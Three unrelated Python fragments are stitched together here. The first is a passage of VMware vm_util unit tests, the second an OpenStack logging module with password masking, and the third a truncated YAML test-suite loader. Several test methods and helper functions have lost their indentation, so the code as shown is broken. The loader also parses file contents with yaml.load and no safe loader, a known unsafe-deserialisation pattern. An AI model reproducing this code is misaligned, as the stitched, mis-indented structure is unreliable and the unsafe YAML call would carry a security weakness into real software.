        MoRef = collections.namedtuple('Val', ['value'])
        good_objects = fake.FakeRetrieveResult()
        results_good = [
            ObjectContent(propSet=[
                DynamicProperty(name='name', val=MoRef(value='vm-123'))]),
            ObjectContent(propSet=[
                DynamicProperty(name='foo', val=MoRef(value='bar1')),
                DynamicProperty(
                    name='runtime.host', val=MoRef(value='host-123')),
                DynamicProperty(name='foo', val=MoRef(value='bar2')),
            ]),
            ObjectContent(propSet=[
                DynamicProperty(
                    name='something', val=MoRef(value='thing'))]), ]
        for result in results_good:
            good_objects.add_object(result)
        # The "bad" set has no 'runtime.host' property at all.
        bad_objects = fake.FakeRetrieveResult()
        results_bad = [
            ObjectContent(propSet=[
                DynamicProperty(name='name', val=MoRef(value='vm-123'))]),
            ObjectContent(propSet=[
                DynamicProperty(name='foo', val='bar1'),
                DynamicProperty(name='foo', val='bar2'), ]),
            ObjectContent(propSet=[
                DynamicProperty(
                    name='something', val=MoRef(value='thing'))]), ]
        for result in results_bad:
            bad_objects.add_object(result)
        prop = vm_util.property_from_property_set(
            'runtime.host', good_objects)
        self.assertIsNotNone(prop)
        value = prop.val.value
        self.assertEqual('host-123', value)
        prop2 = vm_util.property_from_property_set(
            'runtime.host', bad_objects)
        self.assertIsNone(prop2)
        # Duplicate names: the first occurrence wins.
        prop3 = vm_util.property_from_property_set('foo', good_objects)
        self.assertIsNotNone(prop3)
        val3 = prop3.val.value
        self.assertEqual('bar1', val3)
        prop4 = vm_util.property_from_property_set('foo', bad_objects)
        self.assertIsNotNone(prop4)
        self.assertEqual('bar1', prop4.val)
    def test_get_datastore_ref_and_name_inaccessible_ds(self):
        # A datastore with summary.accessible == False must be skipped,
        # leaving no candidate and raising DatastoreNotFound.
        data_store = fake.Datastore()
        data_store.set("summary.accessible", False)
        fake_objects = fake.FakeRetrieveResult()
        fake_objects.add_object(data_store)
        self.assertRaises(exception.DatastoreNotFound,
                          vm_util.get_datastore_ref_and_name,
                          fake_session(fake_objects))
    def test_get_resize_spec(self):
        # The resize spec should carry only the new vCPU count and memory
        # size; comparison is on the whitespace-normalized repr of the
        # fake factory's spec object.
        fake_instance = {'id': 7, 'name': 'fake!',
                         'uuid': 'bda5fb9e-b347-40e8-8256-42397848cb00',
                         'vcpus': 2, 'memory_mb': 2048}
        result = vm_util.get_vm_resize_spec(fake.FakeFactory(),
                                            fake_instance)
        expected = """{'memoryMB': 2048,
                       'numCPUs': 2,
                       'obj_name': 'ns0:VirtualMachineConfigSpec'}"""
        expected = re.sub(r'\s+', '', expected)
        result = re.sub(r'\s+', '', repr(result))
        self.assertEqual(expected, result)
    def test_get_cdrom_attach_config_spec(self):
        # Attach an ISO-backed CDROM at controller 200/unit 0 and compare
        # the whitespace-normalized repr of the resulting device change.
        result = vm_util.get_cdrom_attach_config_spec(fake.FakeFactory(),
                                             fake.Datastore(),
                                             "/tmp/foo.iso",
                                             0)
        expected = """{
    'deviceChange': [
        {
            'device': {
                'connectable': {
                    'allowGuestControl': False,
                    'startConnected': True,
                    'connected': True,
                    'obj_name': 'ns0: VirtualDeviceConnectInfo'
                },
                'backing': {
                    'datastore': {
                        "summary.type": "VMFS",
                        "summary.freeSpace": 536870912000,
                        "summary.capacity": 1099511627776,
                        "summary.accessible":true,
                        "summary.name": "fake-ds"
                    },
                    'fileName': '/tmp/foo.iso',
                    'obj_name': 'ns0: VirtualCdromIsoBackingInfo'
                },
                'controllerKey': 200,
                'unitNumber': 0,
                'key': -1,
                'obj_name': 'ns0: VirtualCdrom'
            },
            'operation': 'add',
            'obj_name': 'ns0: VirtualDeviceConfigSpec'
        }
    ],
    'obj_name': 'ns0: VirtualMachineConfigSpec'
}
"""
        expected = re.sub(r'\s+', '', expected)
        result = re.sub(r'\s+', '', repr(result))
        self.assertEqual(expected, result)
    def test_lsilogic_controller_spec(self):
        # Test controller spec returned for lsiLogic sas adapter type
        config_spec = vm_util.create_controller_spec(fake.FakeFactory(), -101,
                                          adapter_type="lsiLogicsas")
        self.assertEqual("ns0:VirtualLsiLogicSASController",
                         config_spec.device.obj_name)
    def test_get_vmdk_path_and_adapter_type(self):
        # Test the adapter_type returned for a lsiLogic sas controller
        controller_key = 1000
        filename = '[test_datastore] test_file.vmdk'
        disk = fake.VirtualDisk()
        disk.controllerKey = controller_key
        disk_backing = fake.VirtualDiskFlatVer2BackingInfo()
        disk_backing.fileName = filename
        disk.backing = disk_backing
        # The controller is matched to the disk via the shared key.
        controller = fake.VirtualLsiLogicSASController()
        controller.key = controller_key
        devices = [disk, controller]
        vmdk_info = vm_util.get_vmdk_path_and_adapter_type(devices)
        # vmdk_info is a tuple; index 2 is the adapter type string.
        adapter_type = vmdk_info[2]
        self.assertEqual('lsiLogicsas', adapter_type)
def test_get_vmdk_adapter_type(self):
# Test for the adapter_type to be used in vmdk descriptor
# Adapter type in vmdk descriptor is same for LSI-SAS & LSILogic
vmdk_adapter_type = vm_util.get_vmdk_adapter_type("lsiLogic")
self.assertEqual("lsiLogic", vmdk_adapter_type)
vmdk_adapter_type = vm_util.get_vmdk_adapter_type("lsiLogicsas")
self.assertEqual("lsiLogic", vmdk_adapter_type)
vmdk_adapter_type = vm_util.get_vmdk_adapter_type("dummyAdapter")
self.assertEqual("dummyAdapter", vmdk_adapter_type)
def _test_get_vnc_config_spec(self, port, password):
result = vm_util.get_vnc_config_spec(fake.FakeFactory(),
port, password)
return result
    def test_get_vnc_config_spec(self):
        # Without a password only the enable flag and the port appear in
        # extraConfig (compared via whitespace-normalized repr).
        result = self._test_get_vnc_config_spec(7, None)
        expected = """{'extraConfig': [
                        {'value': 'true',
                         'key': 'RemoteDisplay.vnc.enabled',
                         'obj_name': 'ns0:OptionValue'},
                        {'value': 7,
                         'key': 'RemoteDisplay.vnc.port',
                         'obj_name': 'ns0:OptionValue'}],
                       'obj_name': 'ns0:VirtualMachineConfigSpec'}"""
        expected = re.sub(r'\s+', '', expected)
        result = re.sub(r'\s+', '', repr(result))
        self.assertEqual(expected, result)
    def test_get_vnc_config_spec_password(self):
        # With a password a third OptionValue entry for
        # RemoteDisplay.vnc.password is appended to extraConfig.
        result = self._test_get_vnc_config_spec(7, 'password')
        expected = """{'extraConfig': [
                        {'value': 'true',
                         'key': 'RemoteDisplay.vnc.enabled',
                         'obj_name': 'ns0:OptionValue'},
                        {'value': 7,
                         'key': 'RemoteDisplay.vnc.port',
                         'obj_name': 'ns0:OptionValue'},
                        {'value':'password',
                         'key':'RemoteDisplay.vnc.password',
                         'obj_name':'ns0:OptionValue'}],
                       'obj_name': 'ns0:VirtualMachineConfigSpec'}"""
        expected = re.sub(r'\s+', '', expected)
        result = re.sub(r'\s+', '', repr(result))
        self.assertEqual(expected, result)
def test_get_all_cluster_refs_by_name_none(self):
fake_objects = fake.FakeRetrieveResult()
refs = vm_util.get_all_cluster_refs_by_name(fake_session(fake_objects),
['fake_cluster'])
self.assertTrue(not refs)
def test_get_all_cluster_refs_by_name_exists(self):
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.ClusterComputeResource(name='cluster'))
refs = vm_util.get_all_cluster_refs_by_name(fake_session(fake_objects),
['cluster'])
self.assertTrue(len(refs) == 1)
def test_get_all_cluster_refs_by_name_missing(self):
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(partialObject(path='cluster'))
refs = vm_util.get_all_cluster_refs_by_name(fake_session(fake_objects),
['cluster'])
self.assertTrue(not refs)
def test_propset_dict_simple(self):
ObjectContent = collections.namedtuple('ObjectContent', ['propSet'])
DynamicProperty = collections.namedtuple('Property', ['name', 'val'])
object = ObjectContent(propSet=[
DynamicProperty(name='foo', val="bar")])
propdict = vm_util.propset_dict(object.propSet)
self.assertEqual("bar", propdict['foo'])
def test_propset_dict_complex(self):
ObjectContent = collections.namedtuple('ObjectContent', ['propSet'])
DynamicProperty = collections.namedtuple('Property', ['name', 'val'])
MoRef = collections.namedtuple('Val', ['value'])
object = ObjectContent(propSet=[
DynamicProperty(name='foo', val="bar"),
DynamicProperty(name='some.thing',
val=MoRef(value='else')),
DynamicProperty(name='another.thing', val='value')])
propdict = vm_util.propset_dict(object.propSet)
self.assertEqual("bar", propdict['foo'])
self.assertTrue(hasattr(propdict['some.thing'], 'value'))
self.assertEqual("else", propdict['some.thing'].value)
self.assertEqual("value", propdict['another.thing'])
    def _test_detach_virtual_disk_spec(self, destroy_disk=False):
        # Shared helper: the detach spec always removes the device; the
        # fileOperation attribute is present only when destroy_disk is set.
        virtual_device_config = vm_util.detach_virtual_disk_spec(
                                                     fake.FakeFactory(),
                                                     'fake_device',
                                                     destroy_disk)
        self.assertEqual('remove', virtual_device_config.operation)
        self.assertEqual('fake_device', virtual_device_config.device)
        self.assertEqual('ns0:VirtualDeviceConfigSpec',
                         virtual_device_config.obj_name)
        if destroy_disk:
            self.assertEqual('destroy', virtual_device_config.fileOperation)
        else:
            self.assertFalse(hasattr(virtual_device_config, 'fileOperation'))
    def test_detach_virtual_disk_spec(self):
        # Detach without destroying the backing disk file.
        self._test_detach_virtual_disk_spec(destroy_disk=False)
    def test_detach_virtual_disk_destroy_spec(self):
        # Detach and destroy the backing disk file as well.
        self._test_detach_virtual_disk_spec(destroy_disk=True)
| |
# Copyright 2011 OpenStack Foundation.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""OpenStack logging handler.
This module adds to the logging functionality the option to specify
a context object when calling the various log methods. If the context object
is not specified, default formatting is used. Additionally, an instance uuid
may be passed as part of the log message, which is intended to make it easier
for admins to find messages related to a specific instance.
It also allows setting of formatting information through configuration options.
"""
import inspect
import itertools
import logging
import logging.config
import logging.handlers
import os
import re
import sys
import traceback
from oslo.config import cfg
import six
from six import moves
from heat.openstack.common.gettextutils import _
from heat.openstack.common import importutils
from heat.openstack.common import jsonutils
from heat.openstack.common import local
_DEFAULT_LOG_DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
_SANITIZE_KEYS = ['adminPass', 'admin_pass', 'password', 'admin_password']
# NOTE(ldbragst): Let's build a list of regex objects using the list of
# _SANITIZE_KEYS we already have. This way, we only have to add the new key
# to the list of _SANITIZE_KEYS and we can generate regular expressions
# for XML and JSON automatically.
_SANITIZE_PATTERNS = []
_FORMAT_PATTERNS = [r'(%(key)s\s*[=]\s*[\"\']).*?([\"\'])',
r'(<%(key)s>).*?(</%(key)s>)',
r'([\"\']%(key)s[\"\']\s*:\s*[\"\']).*?([\"\'])',
r'([\'"].*?%(key)s[\'"]\s*:\s*u?[\'"]).*?([\'"])']
for key in _SANITIZE_KEYS:
for pattern in _FORMAT_PATTERNS:
reg_ex = re.compile(pattern % {'key': key}, re.DOTALL)
_SANITIZE_PATTERNS.append(reg_ex)
# CLI flags shared by every service: -d/--debug and -v/--verbose.
common_cli_opts = [
    cfg.BoolOpt('debug',
                short='d',
                default=False,
                help='Print debugging output (set logging level to '
                     'DEBUG instead of default WARNING level).'),
    cfg.BoolOpt('verbose',
                short='v',
                default=False,
                help='Print more verbose output (set logging level to '
                     'INFO instead of default WARNING level).'),
]
# CLI options selecting log destinations (file, dir, syslog) and formats.
logging_cli_opts = [
    cfg.StrOpt('log-config-append',
               metavar='PATH',
               deprecated_name='log-config',
               help='The name of logging configuration file. It does not '
                    'disable existing loggers, but just appends specified '
                    'logging configuration to any other existing logging '
                    'options. Please see the Python logging module '
                    'documentation for details on logging configuration '
                    'files.'),
    cfg.StrOpt('log-format',
               default=None,
               metavar='FORMAT',
               help='DEPRECATED. '
                    'A logging.Formatter log message format string which may '
                    'use any of the available logging.LogRecord attributes. '
                    'This option is deprecated. Please use '
                    'logging_context_format_string and '
                    'logging_default_format_string instead.'),
    cfg.StrOpt('log-date-format',
               default=_DEFAULT_LOG_DATE_FORMAT,
               metavar='DATE_FORMAT',
               help='Format string for %%(asctime)s in log records. '
                    'Default: %(default)s'),
    cfg.StrOpt('log-file',
               metavar='PATH',
               deprecated_name='logfile',
               help='(Optional) Name of log file to output to. '
                    'If no default is set, logging will go to stdout.'),
    cfg.StrOpt('log-dir',
               deprecated_name='logdir',
               help='(Optional) The base directory used for relative '
                    '--log-file paths'),
    cfg.BoolOpt('use-syslog',
                default=False,
                help='Use syslog for logging.'),
    cfg.StrOpt('syslog-log-facility',
               default='LOG_USER',
               help='syslog facility to receive log lines')
]
generic_log_opts = [
    cfg.BoolOpt('use_stderr',
                default=True,
                help='Log output to standard error')
]
# Config-file-only options controlling record format strings and levels.
log_opts = [
    cfg.StrOpt('logging_context_format_string',
               default='%(asctime)s.%(msecs)03d %(process)d %(levelname)s '
                       '%(name)s [%(request_id)s %(user_identity)s] '
                       '%(instance)s%(message)s',
               help='format string to use for log messages with context'),
    cfg.StrOpt('logging_default_format_string',
               default='%(asctime)s.%(msecs)03d %(process)d %(levelname)s '
                       '%(name)s [-] %(instance)s%(message)s',
               help='format string to use for log messages without context'),
    cfg.StrOpt('logging_debug_format_suffix',
               default='%(funcName)s %(pathname)s:%(lineno)d',
               help='data to append to log format when level is DEBUG'),
    cfg.StrOpt('logging_exception_prefix',
               default='%(asctime)s.%(msecs)03d %(process)d TRACE %(name)s '
                       '%(instance)s',
               help='prefix each line of exception output with this format'),
    cfg.ListOpt('default_log_levels',
                default=[
                    'amqp=WARN',
                    'amqplib=WARN',
                    'boto=WARN',
                    'qpid=WARN',
                    'sqlalchemy=WARN',
                    'suds=INFO',
                    'iso8601=WARN',
                ],
                help='list of logger=LEVEL pairs'),
    cfg.BoolOpt('publish_errors',
                default=False,
                help='publish error events'),
    cfg.BoolOpt('fatal_deprecations',
                default=False,
                help='make deprecations fatal'),
    # NOTE(mikal): there are two options here because sometimes we are handed
    # a full instance (and could include more information), and other times we
    # are just handed a UUID for the instance.
    cfg.StrOpt('instance_format',
               default='[instance: %(uuid)s] ',
               help='If an instance is passed with the log message, format '
                    'it like this'),
    cfg.StrOpt('instance_uuid_format',
               default='[instance: %(uuid)s] ',
               help='If an instance UUID is passed with the log message, '
                    'format it like this'),
]
CONF = cfg.CONF
CONF.register_cli_opts(common_cli_opts)
CONF.register_cli_opts(logging_cli_opts)
CONF.register_opts(generic_log_opts)
CONF.register_opts(log_opts)
# our new audit level
# NOTE(jkoelker) Since we synthesized an audit level, make the logging
# module aware of it so it acts like other levels.
logging.AUDIT = logging.INFO + 1
logging.addLevelName(logging.AUDIT, 'AUDIT')
try:
    NullHandler = logging.NullHandler
except AttributeError:  # NOTE(jkoelker) NullHandler added in Python 2.7
    # Minimal no-op fallback for older interpreters: swallows every
    # record and never allocates a handler lock.
    class NullHandler(logging.Handler):
        def handle(self, record):
            pass
        def emit(self, record):
            pass
        def createLock(self):
            # Nothing is ever written, so no lock is needed.
            self.lock = None
def _dictify_context(context):
if context is None:
return None
if not isinstance(context, dict) and getattr(context, 'to_dict', None):
context = context.to_dict()
return context
def _get_binary_name():
return os.path.basename(inspect.stack()[-1][1])
def _get_log_file_path(binary=None):
    """Return the log file path from CONF.log_file/CONF.log_dir, or None.

    When only a directory is configured, the file name defaults to
    '<binary>.log' with *binary* falling back to the process entry name.
    """
    logfile = CONF.log_file
    logdir = CONF.log_dir
    if logfile and not logdir:
        return logfile
    if logfile and logdir:
        return os.path.join(logdir, logfile)
    if logdir:
        binary = binary or _get_binary_name()
        return '%s.log' % (os.path.join(logdir, binary),)
    # Neither log_file nor log_dir set: caller logs to a stream instead.
    return None
def mask_password(message, secret="***"):
    """Replace password with 'secret' in message.
    :param message: The string which includes security information.
    :param secret: value with which to replace passwords.
    :returns: The unicode value of message with the password fields masked.
    For example:
    >>> mask_password("'adminPass' : 'aaaaa'")
    "'adminPass' : '***'"
    >>> mask_password("'admin_pass' : 'aaaaa'")
    "'admin_pass' : '***'"
    >>> mask_password('"password" : "aaaaa"')
    '"password" : "***"'
    >>> mask_password("'original_password' : 'aaaaa'")
    "'original_password' : '***'"
    >>> mask_password("u'original_password' : u'aaaaa'")
    "u'original_password' : u'***'"
    """
    message = six.text_type(message)
    # Fast path: skip the regex machinery entirely when no sensitive key
    # occurs anywhere in the message.
    if not any(sanitize_key in message for sanitize_key in _SANITIZE_KEYS):
        return message
    # Keep the surrounding delimiters (groups 1 and 2); replace only the
    # secret value between them.
    replacement = r'\g<1>' + secret + r'\g<2>'
    for pattern in _SANITIZE_PATTERNS:
        message = pattern.sub(replacement, message)
    return message
class BaseLoggerAdapter(logging.LoggerAdapter):
    # Extends the stdlib LoggerAdapter with the synthesized AUDIT level
    # (registered on the logging module earlier in this file).
    def audit(self, msg, *args, **kwargs):
        self.log(logging.AUDIT, msg, *args, **kwargs)
class LazyAdapter(BaseLoggerAdapter):
    # Defers creation of the real ContextAdapter (via getLogger) until
    # the first attribute access that needs it.
    def __init__(self, name='unknown', version='unknown'):
        # NOTE: deliberately does not call the base __init__; the real
        # logger is materialized lazily by the `logger` property below.
        self._logger = None
        self.extra = {}
        self.name = name
        self.version = version
    @property
    def logger(self):
        if not self._logger:
            self._logger = getLogger(self.name, self.version)
        return self._logger
class ContextAdapter(BaseLoggerAdapter):
    # Alias so callers may use .warn() as well as .warning().
    warn = logging.LoggerAdapter.warning
    def __init__(self, logger, project_name, version_string):
        self.logger = logger
        self.project = project_name
        self.version = version_string
    @property
    def handlers(self):
        return self.logger.handlers
    def deprecated(self, msg, *args, **kwargs):
        # Log (or, with fatal_deprecations, raise on) use of a
        # deprecated feature.
        stdmsg = _("Deprecated: %s") % msg
        if CONF.fatal_deprecations:
            self.critical(stdmsg, *args, **kwargs)
            raise DeprecatedConfig(msg=stdmsg)
        else:
            self.warn(stdmsg, *args, **kwargs)
    def process(self, msg, kwargs):
        """Inject context, instance and project data into record 'extra'."""
        # NOTE(mrodden): catch any Message/other object and
        #                coerce to unicode before they can get
        #                to the python logging and possibly
        #                cause string encoding trouble
        if not isinstance(msg, six.string_types):
            msg = six.text_type(msg)
        if 'extra' not in kwargs:
            kwargs['extra'] = {}
        extra = kwargs['extra']
        # Explicit context kwarg wins; otherwise fall back to the
        # thread-local store.
        context = kwargs.pop('context', None)
        if not context:
            context = getattr(local.store, 'context', None)
        if context:
            extra.update(_dictify_context(context))
        instance = kwargs.pop('instance', None)
        instance_uuid = (extra.get('instance_uuid', None) or
                         kwargs.pop('instance_uuid', None))
        instance_extra = ''
        if instance:
            instance_extra = CONF.instance_format % instance
        elif instance_uuid:
            instance_extra = (CONF.instance_uuid_format
                              % {'uuid': instance_uuid})
        extra['instance'] = instance_extra
        extra.setdefault('user_identity', kwargs.pop('user_identity', None))
        extra['project'] = self.project
        extra['version'] = self.version
        # Keep a copy under 'extra' so JSONFormatter can emit it verbatim.
        extra['extra'] = extra.copy()
        return msg, kwargs
class JSONFormatter(logging.Formatter):
    # Serializes each LogRecord as a single JSON document.
    def __init__(self, fmt=None, datefmt=None):
        # NOTE(jkoelker) we ignore the fmt argument, but its still there
        # since logging.config.fileConfig passes it.
        # The base initializer is intentionally not called; only datefmt
        # is stored.
        self.datefmt = datefmt
    def formatException(self, ei, strip_newlines=True):
        """Return the traceback as a list of lines (newlines removed)."""
        lines = traceback.format_exception(*ei)
        if strip_newlines:
            lines = [moves.filter(
                lambda x: x,
                line.rstrip().splitlines()) for line in lines]
            lines = list(itertools.chain(*lines))
        return lines
    def format(self, record):
        # Flatten the LogRecord attributes into a JSON-serializable dict.
        message = {'message': record.getMessage(),
                   'asctime': self.formatTime(record, self.datefmt),
                   'name': record.name,
                   'msg': record.msg,
                   'args': record.args,
                   'levelname': record.levelname,
                   'levelno': record.levelno,
                   'pathname': record.pathname,
                   'filename': record.filename,
                   'module': record.module,
                   'lineno': record.lineno,
                   'funcname': record.funcName,
                   'created': record.created,
                   'msecs': record.msecs,
                   'relative_created': record.relativeCreated,
                   'thread': record.thread,
                   'thread_name': record.threadName,
                   'process_name': record.processName,
                   'process': record.process,
                   'traceback': None}
        # 'extra' is attached by ContextAdapter.process().
        if hasattr(record, 'extra'):
            message['extra'] = record.extra
        if record.exc_info:
            message['traceback'] = self.formatException(record.exc_info)
        return jsonutils.dumps(message)
def _create_logging_excepthook(product_name):
    """Build a sys.excepthook that logs uncaught exceptions as CRITICAL."""
    def logging_excepthook(exc_type, value, tb):
        extra = {}
        # Only attach the full traceback when debug/verbose is on.
        if CONF.verbose or CONF.debug:
            extra['exc_info'] = (exc_type, value, tb)
        getLogger(product_name).critical(
            "".join(traceback.format_exception_only(exc_type, value)),
            **extra)
    return logging_excepthook
class LogConfigError(Exception):
    """Raised when a logging configuration file cannot be loaded."""

    message = _('Error loading logging config %(log_config)s: %(err_msg)s')

    def __init__(self, log_config, err_msg):
        self.log_config = log_config
        self.err_msg = err_msg

    def __str__(self):
        return self.message % {'log_config': self.log_config,
                               'err_msg': self.err_msg}
def _load_log_config(log_config_append):
    """Append a logging config file; wrap parse errors in LogConfigError."""
    try:
        logging.config.fileConfig(log_config_append,
                                  disable_existing_loggers=False)
    except moves.configparser.Error as exc:
        raise LogConfigError(log_config_append, str(exc))
def setup(product_name):
    """Setup logging."""
    # An explicit logging config file takes precedence over the
    # option-driven configuration.
    if CONF.log_config_append:
        _load_log_config(CONF.log_config_append)
    else:
        _setup_logging_from_conf()
    # Route uncaught exceptions through the product's logger.
    sys.excepthook = _create_logging_excepthook(product_name)
def set_defaults(logging_context_format_string):
    """Override the default value of the context log format string."""
    cfg.set_defaults(
        log_opts,
        logging_context_format_string=logging_context_format_string)
def _find_facility_from_conf():
    """Resolve CONF.syslog_log_facility to a SysLogHandler facility code.

    Accepts either a SysLogHandler attribute name or a key of
    SysLogHandler.facility_names. Raises TypeError for unknown names.
    """
    facility_names = logging.handlers.SysLogHandler.facility_names
    facility = getattr(logging.handlers.SysLogHandler,
                       CONF.syslog_log_facility,
                       None)
    if facility is None and CONF.syslog_log_facility in facility_names:
        facility = facility_names.get(CONF.syslog_log_facility)
    if facility is None:
        # list() is required: dict.keys() returns a view without
        # extend() on Python 3.
        valid_facilities = list(facility_names.keys())
        # 'LOG_AUTH' appeared twice in the original list; deduplicated.
        consts = ['LOG_AUTH', 'LOG_AUTHPRIV', 'LOG_CRON', 'LOG_DAEMON',
                  'LOG_FTP', 'LOG_KERN', 'LOG_LPR', 'LOG_MAIL', 'LOG_NEWS',
                  'LOG_SYSLOG', 'LOG_USER', 'LOG_UUCP',
                  'LOG_LOCAL0', 'LOG_LOCAL1', 'LOG_LOCAL2', 'LOG_LOCAL3',
                  'LOG_LOCAL4', 'LOG_LOCAL5', 'LOG_LOCAL6', 'LOG_LOCAL7']
        valid_facilities.extend(consts)
        raise TypeError(_('syslog facility must be one of: %s') %
                        ', '.join("'%s'" % fac
                                  for fac in valid_facilities))
    return facility
def _setup_logging_from_conf():
    """Configure the root logger's handlers, formatters and levels
    from the registered configuration options.
    """
    log_root = getLogger(None).logger
    # Start from a clean slate: drop any previously attached handlers.
    for handler in log_root.handlers:
        log_root.removeHandler(handler)
    if CONF.use_syslog:
        facility = _find_facility_from_conf()
        syslog = logging.handlers.SysLogHandler(address='/dev/log',
                                                facility=facility)
        log_root.addHandler(syslog)
    logpath = _get_log_file_path()
    if logpath:
        filelog = logging.handlers.WatchedFileHandler(logpath)
        log_root.addHandler(filelog)
    if CONF.use_stderr:
        streamlog = ColorHandler()
        log_root.addHandler(streamlog)
    elif not logpath:
        # pass sys.stdout as a positional argument
        # python2.6 calls the argument strm, in 2.7 it's stream
        streamlog = logging.StreamHandler(sys.stdout)
        log_root.addHandler(streamlog)
    if CONF.publish_errors:
        handler = importutils.import_object(
            "heat.openstack.common.log_handler.PublishErrorsHandler",
            logging.ERROR)
        log_root.addHandler(handler)
    datefmt = CONF.log_date_format
    for handler in log_root.handlers:
        # NOTE(alaski): CONF.log_format overrides everything currently. This
        # should be deprecated in favor of context aware formatting.
        if CONF.log_format:
            handler.setFormatter(logging.Formatter(fmt=CONF.log_format,
                                                   datefmt=datefmt))
            log_root.info('Deprecated: log_format is now deprecated and will '
                          'be removed in the next release')
        else:
            handler.setFormatter(ContextFormatter(datefmt=datefmt))
    # Root level: debug wins over verbose, default is WARNING.
    if CONF.debug:
        log_root.setLevel(logging.DEBUG)
    elif CONF.verbose:
        log_root.setLevel(logging.INFO)
    else:
        log_root.setLevel(logging.WARNING)
    # Apply the per-module 'logger=LEVEL' overrides.
    for pair in CONF.default_log_levels:
        mod, _sep, level_name = pair.partition('=')
        level = logging.getLevelName(level_name)
        logger = logging.getLogger(mod)
        logger.setLevel(level)
# Module-level cache: one ContextAdapter per logger name.
_loggers = {}
def getLogger(name='unknown', version='unknown'):
    # Create (at most once) and return the ContextAdapter wrapping the
    # stdlib logger of the given name.
    if name not in _loggers:
        _loggers[name] = ContextAdapter(logging.getLogger(name),
                                        name,
                                        version)
    return _loggers[name]
def getLazyLogger(name='unknown', version='unknown'):
    """Returns lazy logger.
    Creates a pass-through logger that does not create the real logger
    until it is really needed and delegates all calls to the real logger
    once it is created.
    """
    return LazyAdapter(name, version)
class WritableLogger(object):
    """Adapt a logger to the file protocol: each `write` emits a record."""

    def __init__(self, logger, level=logging.INFO):
        self.logger = logger
        self.level = level

    def write(self, msg):
        # Drop the trailing newline that file-like writers usually append.
        stripped = msg.rstrip()
        self.logger.log(self.level, stripped)
class ContextFormatter(logging.Formatter):
    """A context.RequestContext aware formatter configured through flags.
    The flags used to set format strings are: logging_context_format_string
    and logging_default_format_string. You can also specify
    logging_debug_format_suffix to append extra formatting if the log level is
    debug.
    For information about what variables are available for the formatter see:
    http://docs.python.org/library/logging.html#formatter
    """
    def format(self, record):
        """Uses contextstring if request_id is set, otherwise default."""
        # NOTE(sdague): default the fancier formatting params
        # to an empty string so we don't throw an exception if
        # they get used
        for key in ('instance', 'color'):
            if key not in record.__dict__:
                record.__dict__[key] = ''
        # NOTE(review): self._fmt is mutated per record; a formatter
        # shared across threads could interleave formats -- confirm
        # handlers are not shared concurrently.
        if record.__dict__.get('request_id', None):
            self._fmt = CONF.logging_context_format_string
        else:
            self._fmt = CONF.logging_default_format_string
        if (record.levelno == logging.DEBUG and
                CONF.logging_debug_format_suffix):
            self._fmt += " " + CONF.logging_debug_format_suffix
        # Cache this on the record, Logger will respect our formatted copy
        if record.exc_info:
            record.exc_text = self.formatException(record.exc_info, record)
        return logging.Formatter.format(self, record)
    def formatException(self, exc_info, record=None):
        """Format exception output with CONF.logging_exception_prefix."""
        if not record:
            return logging.Formatter.formatException(self, exc_info)
        stringbuffer = moves.StringIO()
        traceback.print_exception(exc_info[0], exc_info[1], exc_info[2],
                                  None, stringbuffer)
        lines = stringbuffer.getvalue().split('\n')
        stringbuffer.close()
        # Only compute asctime when the prefix actually references it.
        if CONF.logging_exception_prefix.find('%(asctime)') != -1:
            record.asctime = self.formatTime(record, self.datefmt)
        formatted_lines = []
        for line in lines:
            pl = CONF.logging_exception_prefix % record.__dict__
            fl = '%s%s' % (pl, line)
            formatted_lines.append(fl)
        return '\n'.join(formatted_lines)
class ColorHandler(logging.StreamHandler):
    # Stream handler that exposes an ANSI color escape for the record's
    # level via record.color (consumed by format strings using %(color)s).
    LEVEL_COLORS = {
        logging.DEBUG: '\033[00;32m',  # GREEN
        logging.INFO: '\033[00;36m',  # CYAN
        logging.AUDIT: '\033[01;36m',  # BOLD CYAN
        logging.WARN: '\033[01;33m',  # BOLD YELLOW
        logging.ERROR: '\033[01;31m',  # BOLD RED
        logging.CRITICAL: '\033[01;31m',  # BOLD RED
    }
    def format(self, record):
        record.color = self.LEVEL_COLORS[record.levelno]
        return logging.StreamHandler.format(self, record)
class DeprecatedConfig(Exception):
    """Raised when a fatally-deprecated config option is exercised."""
    message = _("Fatal call to deprecated config: %(msg)s")

    def __init__(self, msg):
        # super(DeprecatedConfig, ...): the original super(Exception, self)
        # skipped Exception in the MRO and initialized BaseException directly.
        super(DeprecatedConfig, self).__init__(self.message % dict(msg=msg))
| |
"""
Load test suite descriptions and generate test runner files.
"""
import yaml
import os
import os.path
from textwrap import dedent
import re
import json
from jinja2 import Environment, PackageLoader
import urllib
import logging
# Module-level logger.
LOGGER = logging.getLogger(__name__)
# Set up the template environment
TEMPLATE_LOADER = PackageLoader(__package__)
TEMPLATE_ENV = Environment(
    loader=TEMPLATE_LOADER, trim_blocks=True
)
# Expose json.dumps to templates as the 'tojson' filter.
TEMPLATE_ENV.filters["tojson"] = json.dumps
class SuiteDescriptionError(Exception):
    """
    Raised when the suite description is invalid.
    For example, if the suite description file is missing
    required data, cannot be parsed, or names an unknown test runner.
    """
    pass
class SuiteDescription(object):
"""
Description of a JavaScript test suite loaded from a file.
"""
REQUIRED_KEYS = [
'test_suite_name',
'src_paths',
'spec_paths',
'test_runner'
]
# Supported test runners
TEST_RUNNERS = ['jasmine', 'jasmine_requirejs']
def __init__(self, file_handle, root_dir):
"""
Load the test suite description from a file.
`file_handle` is a file-like object containing the test suite
description (YAML format).
`root_dir` is the directory relative to which paths are specified
in the test suite description. This directory must exist.
Raises a `SuiteDescriptionError` if the YAML file could
not be loaded or contains invalid data.
"""
# Load the YAML file describing the test suite
try:
self._desc_dict = yaml.load(file_handle.read())
except (IOError, ValueError):
raise SuiteDescriptionError("Could not load suite description file")
# Store the root directory
self._root_dir = root_dir
# Validate that we have all the required data
# Raises a `SuiteDescriptionError` if the required data is not found
self._validate_description(self._desc_dict)
# Validate the root directory
self._validate_root_dir(self._root_dir)
# Validate that the suite name is acceptable
